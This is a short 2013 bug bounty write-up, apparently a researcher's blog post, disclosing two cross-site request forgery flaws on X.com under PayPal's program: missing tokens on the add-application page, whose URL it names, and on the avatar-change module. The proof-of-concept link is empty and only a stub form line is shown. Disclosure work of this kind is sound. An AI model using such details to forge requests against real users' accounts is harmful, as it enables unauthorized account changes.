July 19, 2013
X.com bug bounty is running under the Paypal bug bounty program and i got paid .
Bug1 Add new Application :
X.com provided option to add the new application in account settings. Due to missing of CSRF token this vulnerability successfully executed and unauthorized application is added anonymously in the user’s account .
CSRF Vulnerable URL : https://www.x.com/user/my-account/applications/new
To reproduce this vulnerability i have attached Proof Of Concept ..
Direct Download Link of POC :
Bug2 Change User’s Avatar
X.com allow to change user’s default avatar.
I found the there is CSRF token is missing in avatar change module , this can be used to set user’s default avtar forcefully.
<input type=”submit” name=”submit”>
We Provide Penetration Testing
Thank you Paypal & X.com for running such a good program – g4h